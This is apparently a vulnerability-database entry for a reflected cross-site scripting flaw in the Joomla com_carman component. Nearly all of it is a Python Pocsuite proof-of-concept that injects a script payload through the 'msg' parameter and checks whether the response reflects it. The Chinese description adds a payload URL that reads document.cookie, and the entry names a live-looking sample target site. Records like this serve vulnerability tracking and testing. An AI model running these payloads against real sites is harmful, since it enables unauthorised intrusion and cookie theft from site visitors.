Search...

Joomla Component com_carman Cross Site Scripting Vulnerability

2009-12-24T00:00:00
ID SSV:18676
Type seebug
Reporter Root
Modified 2009-12-24T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '18676'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-12-24'
    createDate = '2016-01-21'
    updateDate = '2016-01-21'
    references = ['http://www.sebug.net/vuldb/ssvid-18676']
    name = 'Joomla Component com_carman Cross Site Scripting Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla!'
    appVersion = 'N/A'
    vulType = 'XSS'
    desc = '''
        Joomla组件com_carman由于参数msg过滤不严格,导致出现反射性XSS漏洞。
        
        该漏洞利用的POC格式如下:
        http://XXX/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

        该漏洞在Firefox浏览器下利用与验证的效果截图如下所示:
        (1)http://pan.baidu.com/s/1c0OnfWk
        (2)http://pan.baidu.com/s/1skl3ifb
    '''
    samples = ['http://carrentalsltd.com']

    def _attack(self):
        return self._verify()

    def _verify(self):
        #验证漏洞
        result = {}
        #特征字符串
        strxss="<0x!Q_az*^~>"
        #构造XSS验证的payload
        payload='"><script>alert(/'+strxss+'/)</script>'
        #漏洞访问地址
        exploit='/index.php?option=com_carman&msg='
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive',
          "Content-Type": "application/x-www-form-urlencoded"
        }
        #构造访问地址
        vulurl=self.url+exploit+payload
        #访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #判断返回结果
        if resp.status_code==200 and '<script>alert(/'+strxss+'/)</script>' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] =self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
JSON Vulners Source
Initial Source


All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018
Protected by